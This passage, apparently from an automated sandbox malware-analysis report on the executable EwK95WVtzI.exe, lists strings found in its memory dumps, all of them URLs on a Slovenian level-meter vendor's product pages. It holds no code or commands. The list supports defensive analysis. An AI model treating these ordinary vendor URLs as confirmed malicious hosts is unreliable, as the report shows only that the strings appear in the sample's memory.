00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritev
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/nivojsk
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/regulac
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/varnost
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/zvezna-
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/dodatni-pribo
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/inteligentni-
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/membranski-ve
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/mollet-molosc
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/naprave-za-tl
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/nivojska-stik
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/zvezni-meriln
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/bypass-nivojno-ohisje
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/bypass-prikazovalniki
